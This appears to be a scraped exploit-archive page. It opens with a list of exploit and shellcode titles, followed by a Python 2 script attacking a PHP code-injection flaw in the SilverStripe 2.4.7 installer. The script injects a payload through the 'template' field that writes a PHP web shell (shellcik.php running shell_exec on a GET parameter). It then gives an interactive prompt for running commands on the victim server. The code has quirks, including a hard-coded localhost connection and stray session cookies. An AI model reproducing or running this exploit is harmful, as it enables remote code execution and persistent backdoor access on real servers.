
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
76 lines
No EOL
3.6 KiB
Python
Executable file
76 lines
No EOL
3.6 KiB
Python
Executable file
# source: https://www.securityfocus.com/bid/53282/info
|
|
#
|
|
# SilverStripe is prone to a remote PHP code-injection vulnerability.
|
|
#
|
|
# An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
|
|
#
|
|
# SilverStripe 2.4.7 is vulnerable; other versions may also be affected.
|
|
#
|
|
|
|
#!/usr/bin/env python
|
|
# -*- coding:utf-8 -*-
|
|
import httplib, urllib, urllib2,sys, getopt
|
|
|
|
def Menu():
|
|
print "\n\n-------------------------------------------------------"
|
|
print "-Kullanim Klavuzu [ USAGE ] "
|
|
print "-------------------------------------------------------"
|
|
print "- Temel Kullanim - I [ Default Usage ] : "
|
|
print "- python exo.py www.target.com / \n"
|
|
print "- Temel Kullanim - II [ Default Usage ] : "
|
|
print "- python exo.py www.target.com /path/ \n"
|
|
if (len(sys.argv) <= 2) or (len(sys.argv) > 3):
|
|
Menu()
|
|
exit(1)
|
|
host = sys.argv[1]
|
|
path = sys.argv[2]
|
|
|
|
print " [+] Exploit ediliyor..!"
|
|
payload="blackcandy');fwrite(fopen("
|
|
payload+='"../shellcik.php","w"), '
|
|
payload+="'<?php $gelen"
|
|
payload+='=@$_GET["gelen"]; echo shell_exec($gelen);?>'
|
|
parametreler = urllib.urlencode({'db[type]':'MySQLDatabase',
|
|
'db[MySQLDatabase][server]':'localhost',
|
|
'db[MySQLDatabase][username]':'root',
|
|
'db[MySQLDatabase][password]':'qwe123',
|
|
'db[MySQLDatabase][database]':'SS_mysite',
|
|
'db[MSSQLDatabase][server]':'localhost',
|
|
'db[MSSQLDatabase][username]':'root',
|
|
'db[MSSQLDatabase][password]':'qwe123',
|
|
'db[MSSQLDatabase][database]':'SS_mysite',
|
|
'db[PostgreSQLDatabase][server]':'localhost',
|
|
'db[PostgreSQLDatabase][username]':'root',
|
|
'db[PostgreSQLDatabase][password]':'qwe123',
|
|
'db[PostgreSQLDatabase][database]':'SS_mysite',
|
|
'db[SQLiteDatabase][path]':'/var/www/SilverStripe/assets/.db',
|
|
'db[SQLiteDatabase][database]':'SS_mysite',
|
|
'admin[username]':'admin',
|
|
'admin[password]':'qwe123',
|
|
'locale':'en_US',
|
|
'template':payload,
|
|
'stats':'on',
|
|
'go':'Installing SilverStripe...'})
|
|
print " [+]Parametreler olusturuldu [ Params Generated For Http Request ]"
|
|
basliklar = {"Content-type": "application/x-www-form-urlencoded",
|
|
"Accept": "text/plain",
|
|
"User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0",
|
|
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
|
|
"Accept-Language":"en-us,en;q=0.5",
|
|
"Accept-Encoding":"gzip, deflate",
|
|
"Connection":"keep-alive",
|
|
"Referer":"http://" + host + path+"install.php",
|
|
"Cookie":"alc_enc=1%3Aa9dbf14198a8f6bd9dd2d2c3e41e7164fb206d76; PastMember=1; PHPSESSID=0d7k4e661jd96i0u64vij68am3; phpbb3_srzvs_k=; phpbb3_srzvs_u=2; phpbb3_srzvs_sid=ede0a17fc1f375d6a633f291119c92d7; style_cookie=null; PHPSESSID=j7nr6uro3jc5tulodfeoum3u90; fws_cust=mince%232%23d41d8cd98f00b204e9800998ecf8427e"
|
|
}
|
|
print " [+]Basliklar olusturuldu [ Headers Generated For Http Request ]"
|
|
conn = httplib.HTTPConnection("localhost:80")
|
|
conn.request("POST",str(path) +"install.php",parametreler,basliklar)
|
|
responce = conn.getresponse()
|
|
if responce.status != 200:
|
|
print "[+]Http Hatasi : " + responce.status + "\n"
|
|
print "Cant Exploit!:("
|
|
if responce.status == 200:
|
|
komut=""
|
|
while( komut != "exit" ):
|
|
komut = urllib.quote_plus(str(raw_input("Shell :) => ")))
|
|
print urllib2.urlopen("http://" + host + path+"shellcik.php?gelen="+komut).read() |